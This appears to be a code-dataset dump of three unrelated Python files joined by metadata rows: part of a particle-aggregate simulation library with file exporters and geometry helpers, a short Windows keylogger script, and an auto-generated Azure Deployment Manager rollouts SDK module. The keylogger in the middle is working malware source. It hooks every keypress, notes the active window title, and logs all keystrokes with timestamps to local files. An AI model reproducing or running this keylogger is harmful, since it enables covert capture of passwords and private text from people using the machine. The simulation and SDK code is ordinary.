max_div_z = int(np.ceil((zmax-zmin) / r_min))
# calculate:
# Df = Log(# cubes covering object) / log( 1/ box size)
# pseudo-code from http://paulbourke.net/fractals/cubecount/
# for all offsets
# for all box sizes s
# N(s) = 0
# for all box positions
# for all voxels inside the current box
# if the voxel is part of the object
# N(s) = N(s) + 1
# stop searching voxels in the current box
# end
# end
# end
# end
# end
def to_xyz(self, filename, extended=False):
"""
Writes monomer positions to a file using the simple XYZ format as here:
https://en.wikipedia.org/wiki/XYZ_file_format
If extended=True then the extended XYZ format is written:
https://libatoms.github.io/QUIP/io.html#module-ase.io.extxyz
(including radius, density etc.)
"""
if not extended:
# <number of atoms>
# comment line
# <element> <X> <Y> <Z>
# ...
headertxt = '%d\n%s' % (len(self.pos), filename)
np.savetxt(filename, self.pos, delimiter=" ", header=headertxt, comments='')
else:
# <number of atoms>
# format definition
# <element> <X> <Y> <Z>
# ...
# format must contain Lattice and Properties
# Lattice="5.44 0.0 0.0 0.0 5.44 0.0 0.0 0.0 5.44" Properties=species:S:1:pos:R:3 Time=0.0
headertxt = '%d\n%s' % (len(self.pos), filename)
np.savetxt(filename, np.hstack( (self.id[:,np.newaxis], self.pos, self.radius[:,np.newaxis])) ,
delimiter=" ", header=headertxt, comments='')
# TODO: add formatted header and fmt statement to savetxt
return
def to_csv(self, filename):
"""
Write key simulation variables (id, position and radius) to a CSV file
"""
headertxt = 'id, x, y, z, radius'
np.savetxt(filename, np.hstack( (self.id[:,np.newaxis], self.pos, self.radius[:,np.newaxis]) ),
delimiter=",", header=headertxt)
return
def from_csv(self, filename, density=None):
"""
Initialise simulation based on a file containing particle ID, position and radius.
Note that particles with the same ID will be treated as members of an aggregate.
"""
simdata = np.genfromtxt(filename, comments='#', delimiter=',')
self.id = simdata[:,0].astype(np.int)
self.pos = simdata[:,1:4]
self.radius = simdata[:,4]
if density is None:
self.density = simdata[:,5]
else:
self.density = np.ones_like(self.id, dtype=float)
self.volume = (4./3.)*np.pi*self.radius**3.
self.mass = self.volume * self.density
self.count = len(self.id)
self.next_id = self.id.max()+1
self.agg_count = len(np.unique(self.id))
return
def to_vtk(self, filename):
"""
Writes the simulation domain to a VTK file. Note that evtk is required!
"""
from evtk.hl import pointsToVTK
# x = np.ascontiguousarray(self.pos[:,0])
# y = np.ascontiguousarray(self.pos[:,1])
# z = np.ascontiguousarray(self.pos[:,2])
x = np.asfortranarray(self.pos[:,0])
y = np.asfortranarray(self.pos[:,1])
z = np.asfortranarray(self.pos[:,2])
radius = np.asfortranarray(self.radius)
mass = np.asfortranarray(self.mass)
id = np.asfortranarray(self.id)
pointsToVTK(filename, x, y, z,
data = {"id" : id, "radius" : radius, "mass": mass})
return
def to_liggghts(self, filename, density=100., num_types=2):
"""
Write to a LIGGGHTS data file, suitable to be read into a simulation.
"""
# Save to a LAMMPS/LIGGGHTS data file, compatible with the read_data function
#
# Output format needs to be:
# 42 atoms
#
# 1 atom types
#
# -0.155000000000000 0.155000000000000 xlo xhi
# -0.155000000000000 0.155000000000000 ylo yhi
# -0.150000000000000 1.200000000000000 zlo zhi
#
# Atoms
#
# 1 1 0.01952820 0.14099100 1.10066000 0.01073252 1000.0 1
# 2 1 0.01811800 0.14345470 1.10433955 0.00536626 1000.0 1
#
# atom-ID atom-type x y z diameter density molecule-ID
#
# etc.
basedir, fname = os.path.split(filename)
if fname.lower()[0:6] != 'data.':
fname = 'data.' + fname
filename = os.path.join(basedir, fname)
liggghts_file = open(filename, 'w')
liggghts_file.write('# LAMMPS data file\n\n')
# Make sure that we shift the particles above the Z axis, so that we can
# always set a floor at z=0 in LIGGGHTS!
if self.pos[:,2].min() < 0:
offset = abs(self.pos[:,2].min()) + 2.*self.radius.max()
else:
offset = 0.
# TODO: update for aggregates once that code is in place
liggghts_file.write(str(self.count) + ' atoms \n\n')
liggghts_file.write('%d atom types\n\n' % num_types)
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
zmin += offset
zmax += offset
liggghts_file.write(str(xmin) + ' ' + str(xmax) + ' xlo xhi\n')
liggghts_file.write(str(ymin) + ' ' + str(ymax) + ' ylo yhi\n')
liggghts_file.write(str(zmin) + ' ' + str(zmax) + ' zlo zhi\n\n')
liggghts_file.write('Atoms\n\n')
for idx in range(self.count):
liggghts_file.write(str(self.id[idx]+1) + ' ' + str(1) + ' ' + str(2.*self.radius[idx]) + ' ' +
str(density) + ' ' + str(self.pos[idx,0]) + ' ' + str(self.pos[idx,1]) + ' ' + str(self.pos[idx,2]+offset) + '\n')
liggghts_file.close()
return
def projection(self, xpix=512, ypix=512, vector=None, show=False, png=None):
"""
Produces a binary projection of the simulation with the number of
pixels specified by xpix and ypix along the direction given by
vector.
If png= is set to a filename, a 2D graphic will be output.
If show=True the image will be displayed.
"""
binary_image = np.zeros( (xpix,ypix), dtype=bool )
farthest = self.farthest() + 2.*self.radius.max()
xs = np.linspace(-farthest, farthest, xpix)
ys = np.linspace(-farthest, farthest, ypix)
# TODO select out points that are in proxity to pixel projection
# TODO: rotate points (about origin) such that the normal of the plane
# matches vector
if vector is not None:
R = R_2vect( [0,0,1], vector)
old_pos = self.pos
self.pos = np.dot(self.pos, R)
for y_idx in range(ypix):
for x_idx in range(xpix):
pcle_id, intersect = self.intersect( (xs[x_idx], ys[y_idx], farthest), [0,0,-1], closest=True )
if intersect is not None:
binary_image[y_idx,x_idx] = True
if png is not None or show:
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
ax.imshow(binary_image, cmap=plt.cm.binary, extent=[-farthest, farthest, -farthest, farthest])
if png is not None:
fig.savefig(png)
if show:
plt.show()
if vector is not None:
self.pos = old_pos
return binary_image
def to_afm(self, xpix=256, ypix=256):
"""
Assuming an infinitely sharp tip, this routine samples the simulation domain
(up to the bounding box) at regular points in the XY plane, defined by the
number of x and y pixels given by xpix and ypix.
A 2D height field is returned which gives a simulated AFM image at the given
resolution. Note that the 'substrate' is assumed simply to be the lowest
point in the aggregate and values with no particle will be set to zero there."""
afm_image = np.zeros( (xpix,ypix), dtype=np.float )
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
height = zmax + self.radius.max()
xs = np.linspace(xmin, xmax, xpix)
ys = np.linspace(ymin, ymax, ypix)
for y_idx in range(ypix):
for x_idx in range(xpix):
pcle_id, intersect = self.intersect( (xs[x_idx], ys[y_idx], height), (0.,0.,-1.), closest=True )
if intersect is None:
afm_image[y_idx,x_idx] = zmin
else:
afm_image[y_idx,x_idx] = intersect[2]
afm_image -= afm_image.min()
return afm_image
def to_gsf(self, filename, xpix=256, ypix=256):
"""
Generates an AFM height field using to_afm() and writes to a Gwyddion simple
field file (.gsf). The full file description can be found at:
http://gwyddion.net/documentation/user-guide-en/gsf.html
"""
import os, struct
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
afm_image = self.to_afm(xpix=xpix, ypix=ypix)
if os.path.splitext(filename) != '.gsf':
filename += '.gsf'
gsf_file = open(filename, 'w')
gsf_file.write('Gwyddion Simple Field 1.0\n')
gsf_file.write('XRes = %d\n' % xpix)
gsf_file.write('YRes = %d\n' % ypix)
gsf_file.write('XReal = %5.3f\n' % (xmax-xmin))
gsf_file.write('YReal = %5.3f\n' % (ymax-ymin))
gsf_file.close()
# pad to the nearest 4-byte boundary with NULLs
filesize = os.path.getsize(filename)
padding = filesize % 4
pad = struct.Struct('%dx' % padding)
gsf_file = open(filename, 'ab')
gsf_file.write(pad.pack())
# Data values are stored as IEEE 32bit single-precision floating point numbers,
# in little-endian (LSB, or Intel) byte order. Values are stored by row, from top to bottom,
# and in each row from left to right.
s = struct.pack('<%df' % (xpix*ypix), *np.ravel(afm_image).tolist())
gsf_file.write(s)
gsf_file.close()
return
def rotate(self, direction, angle):
"""
Rotates the entire simulation (typically an aggregate centred on
the origin) about the origin. Usually this is used to provide a
random orientation. Inputs are a direction (vector) and an angle
(in degrees).
A rotation matrix will be calculated between the specified axis and the
given vector, and this will be applied to the particles in the simulation.
"""
# Rotation matrix code from here:
# https://mail.scipy.org/pipermail/numpy-discussion/2009-March/040806.html
d = np.array(direction, dtype=np.float64)
d /= np.linalg.norm(d)
angle = np.radians(angle)
eye = np.eye(3, dtype=np.float64)
ddt = np.outer(d, d)
skew = np.array( [[ 0, d[2], -d[1]],
[-d[2], 0, d[0]],
[ d[1], -d[0], 0]], dtype=np.float64)
R = ddt + np.cos(angle) * (eye - ddt) + np.sin(angle) * skew
print R
self.pos = np.dot(self.pos, R)
return
def R_2vect(vector_orig, vector_fin):
"""Calculate the rotation matrix required to rotate from one vector to another.
For the rotation of one vector to another, there are an infinit series of rotation matrices
possible. Due to axially symmetry, the rotation axis can be any vector lying in the symmetry
plane between the two vectors. Hence the axis-angle convention will be used to construct the
matrix with the rotation axis defined as the cross product of the two vectors. The rotation
angle is the arccosine of the dot product of the two unit vectors.
Given a unit vector parallel to the rotation axis, w = [x, y, z] and the rotation angle a,
the rotation matrix R is::
| 1 + (1-cos(a))*(x*x-1) -z*sin(a)+(1-cos(a))*x*y y*sin(a)+(1-cos(a))*x*z |
R = | z*sin(a)+(1-cos(a))*x*y 1 + (1-cos(a))*(y*y-1) -x*sin(a)+(1-cos(a))*y*z |
| -y*sin(a)+(1-cos(a))*x*z x*sin(a)+(1-cos(a))*y*z 1 + (1-cos(a))*(z*z-1) |
@param vector_orig: The unrotated vector defined in the reference frame.
@type vector_orig: numpy array, len 3
@param vector_fin: The rotated vector defined in the reference frame.
@type vector_fin: numpy array, len 3
As here: http://svn.gna.org/svn/relax/tags/1.3.4/maths_fns/rotation_matrix.py
"""
from numpy import matlib
from numpy import array, cross, dot
from numpy.linalg import norm
from math import acos, cos, sin
# R = matlib.zeros((3, 3))
R = np.zeros( (3,3) )
# Convert the vectors to unit vectors.
vector_orig = vector_orig / norm(vector_orig)
vector_fin = vector_fin / norm(vector_fin)
# The rotation axis (normalised).
axis = cross(vector_orig, vector_fin)
axis_len = norm(axis)
if axis_len != 0.0:
axis = axis / axis_len
# Alias the axis coordinates.
x = axis[0]
y = axis[1]
z = axis[2]
# The rotation angle.
angle = acos(dot(vector_orig, vector_fin))
# Trig functions (only need to do this maths once!).
ca = cos(angle)
sa = sin(angle)
# Calculate the rotation matrix elements.
R[0,0] = 1.0 + (1.0 - ca)*(x**2 - 1.0)
R[0,1] = -z*sa + (1.0 - ca)*x*y
R[0,2] = y*sa + (1.0 - ca)*x*z
R[1,0] = z*sa+(1.0 - ca)*x*y
R[1,1] = 1.0 + (1.0 - ca)*(y**2 - 1.0)
R[1,2] = -x*sa+(1.0 - ca)*y*z
R[2,0] = -y*sa+(1.0 - ca)*x*z
R[2,1] = x*sa+(1.0 - ca)*y*z
R[2,2] = 1.0 + (1.0 - ca)*(z**2 - 1.0)
return R
def SqDistPointSegment(a, b, c):
"""Returns the square distance between point c and line segment ab."""
# // Returns the squared distance between point c and segment ab
ab = b - a
ac = c - a
bc = c - b
e = np.dot(ac, ab)
# Handle cases where c projects outside ab
if (e <= 0.):
return np.dot(ac, ac)
f = np.dot(ab, ab)
if (e >= f):
return np.dot(bc, bc)
# Handle cases where c projects onto ab
return np.dot(ac, ac) - e * e / f
def TestSphereCapsule(sphere_pos, sphere_r, cyl_start, cyl_end, cyl_r):
# Compute (squared) distance between sphere center and capsule line segment
dist2 = SqDistPointSegment(cyl_start, cyl_end, sphere_pos)
# If (squared) distance smaller than (squared) sum of radii, they collide
radius = sphere_r + cyl_r
if dist2 <= radius * radius:
return True
else:
return False
| [
"mark@lunartech.org"
] | mark@lunartech.org |
ff5974705f143472c351bf8f4e3490095f6fc4f9 | cd10be27d55a22723a94025a8cc653fb0dec084d | /keylogger.pyw | ca647f5158eca584534df31558567825897a0c1c | [] | no_license | tedski999/python-scripts | a09dafa979ab0550d188a1fdc61984aa64c8688e | aeb283799108b482efa5d082083d0c325f7cb2a4 | refs/heads/master | 2022-12-04T02:48:16.558582 | 2020-08-21T17:06:20 | 2020-08-21T17:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | pyw | from win32gui import GetWindowText, GetForegroundWindow
from pynput.keyboard import Listener
from datetime import datetime
from os import path
import logging
logPath = ".\\logs\\"
lastFocusName = ""
def on_press(key):
global lastFocusName
filename = (str(datetime.now().date()) + ".txt")
logging.basicConfig(filename = path.join(logPath + filename), level = logging.DEBUG, format = "%(message)s")
if lastFocusName != GetWindowText(GetForegroundWindow()):
logging.info("\n" + GetWindowText(GetForegroundWindow()))
lastFocusName = GetWindowText(GetForegroundWindow())
logging.info(str(datetime.now().time()) + ": " + str(key))
with Listener(on_press=on_press) as listener:
listener.join()
| [
"tedjohnsonjs@gmail.com"
] | tedjohnsonjs@gmail.com |
6e6be05f168d51c04778758cfdbef7aef1c73390 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/deploymentmanager/azure-mgmt-deploymentmanager/azure/mgmt/deploymentmanager/aio/operations/_rollouts_operations.py | 3e790f1835a9d269c5154a3a56505a1fc12ed757 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 23,787 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RolloutsOperations:
"""RolloutsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.deploymentmanager.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _create_or_update_initial(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> "_models.RolloutRequest":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if rollout_request is not None:
body_content = self._serialize.body(rollout_request, 'RolloutRequest')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> AsyncLROPoller["_models.RolloutRequest"]:
"""Creates or updates a rollout.
This is an asynchronous operation and can be polled to completion using the location header
returned by this operation.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param rollout_request: Source rollout request object that defines the rollout.
:type rollout_request: ~azure.mgmt.deploymentmanager.models.RolloutRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RolloutRequest or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.deploymentmanager.models.RolloutRequest]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
rollout_name=rollout_name,
rollout_request=rollout_request,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def get(
self,
resource_group_name: str,
rollout_name: str,
retry_attempt: Optional[int] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Gets detailed information of a rollout.
Gets detailed information of a rollout.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param retry_attempt: Rollout retry attempt ordinal to get the result of. If not specified,
result of the latest attempt will be returned.
:type retry_attempt: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if retry_attempt is not None:
query_parameters['retryAttempt'] = self._serialize.query("retry_attempt", retry_attempt, 'int')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> None:
"""Deletes a rollout resource.
Only rollouts in terminal state can be deleted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def cancel(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> "_models.Rollout":
"""Stops a running rollout.
Only running rollouts can be canceled.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.cancel.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/cancel'} # type: ignore
async def restart(
self,
resource_group_name: str,
rollout_name: str,
skip_succeeded: Optional[bool] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Restarts a failed rollout and optionally skips all succeeded steps.
Only failed rollouts can be restarted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param skip_succeeded: If true, will skip all succeeded steps so far in the rollout. If false,
will execute the entire rollout again regardless of the current state of individual resources.
Defaults to false if not specified.
:type skip_succeeded: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.restart.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip_succeeded is not None:
query_parameters['skipSucceeded'] = self._serialize.query("skip_succeeded", skip_succeeded, 'bool')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/restart'} # type: ignore
async def list(
self,
resource_group_name: str,
**kwargs: Any
) -> List["_models.Rollout"]:
"""Lists the rollouts in a resource group.
Lists the rollouts in a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of Rollout, or the result of cls(response)
:rtype: list[~azure.mgmt.deploymentmanager.models.Rollout]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.Rollout"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('[Rollout]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
